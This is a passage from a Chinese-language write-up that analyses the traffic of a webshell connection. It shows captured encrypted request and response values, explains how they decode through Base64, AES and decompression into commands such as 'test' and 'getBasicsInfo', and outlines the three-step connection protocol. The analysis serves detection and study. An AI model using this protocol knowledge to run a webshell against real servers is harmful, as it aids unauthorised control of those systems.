pass=0mQU%2BS1pFnTz3ttVTnAgJVD%2FaBwD3NNXL3TfTExo1weKu4KAhhCu6Gn1EQfX1m9g

经过base64、AES解密、formatParameter解压缩后得到key为methodName,data为test

响应中的内容,前16位依旧是md5的前16位11CD6A8758984163,后16位为md5的后16位6C37AC826A2A04BC,中间的内容经过Base64、AES、解压缩后得到的key为ok,没有data

11CD6A8758984163LF/IpkPvM0iJI4wmpBs2DaoBVvcbDMpwuL7nYS3n/k4=6C37AC826A2A04BC

第三次请求

pass=0mQU%2BS1pFnTz3ttVTnAgJaL8TCstIesj%2BWp7L6WqrPFRQBfGySSNFnReaHo2SeeFe0GmFqnsQs%2BJgrdapN1UsQ%3D%3D

经过base64、AES解密、formatParameter解压缩后得到key为methodName,data为getBasicsInfo

所以在木马连接上,版本的逻辑并没有改变。
(1)发送Payload类的源码,http响应为空
(2)发送参数test,执行Payload中的test方法,如果连接成功,返回内容是ok
(3)发送参数getBacisInfo,执行Payload中的getBacisInfo方法,返回基本信息

上一篇 下一篇

猜你喜欢

热点阅读